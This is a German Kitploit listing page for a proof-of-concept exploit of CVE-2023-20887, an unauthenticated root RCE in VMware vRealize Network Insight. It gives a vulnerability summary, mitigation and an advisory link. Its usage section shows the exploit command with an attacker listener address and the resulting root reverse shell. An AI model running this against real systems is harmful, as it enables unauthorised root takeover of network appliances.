Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight vorauthentifizierter RCE (CVE-2023-20887) | Kitploit
Tools/GitHubGitHub/malwareman007/cve-2023-20887
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight vorauthentifizierter RCE (CVE-2023-20887)

Repository anzeigen
81vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2023-20887

POC für CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) nicht authentifizierte RCE

Technische Analyse

Eine Root-Cause-Analyse der Schwachstelle finden Sie in meinem Blog: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

Zusammenfassung

VMWare Aria Operations for Networks (vRealize Network Insight) ist anfällig für Befehlseinschleusung bei der Annahme von Benutzereingaben über die Apache Thrift RPC-Schnittstelle. Diese Schwachstelle erlaubt es einem entfernten, nicht authentifizierten Angreifer, beliebige Befehle auf dem zugrunde liegenden Betriebssystem als Root-Benutzer auszuführen. Die RPC-Schnittstelle wird durch einen Reverse-Proxy geschützt, der umgangen werden kann. VMware hat den Schweregrad dieses Problems als kritisch eingestuft mit einem maximalen CVSSv3-Basiswert von 9.8. Ein böswilliger Akteur kann im Kontext von 'root' auf dem Gerät entfernte Codeausführung erlangen. VMWare 6.x-Versionen sind anfällig.

Verwendung

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Gegenmaßnahmen

Aktualisieren Sie auf die neueste Version oder mildern Sie die Schwachstelle durch Befolgen der Anweisungen im Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Haftungsausschluss

Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu gedacht, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich autorisiert. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für die missbräuchliche Verwendung der Software. Verwenden Sie sie verantwortungsbewusst.

Tool herunterladen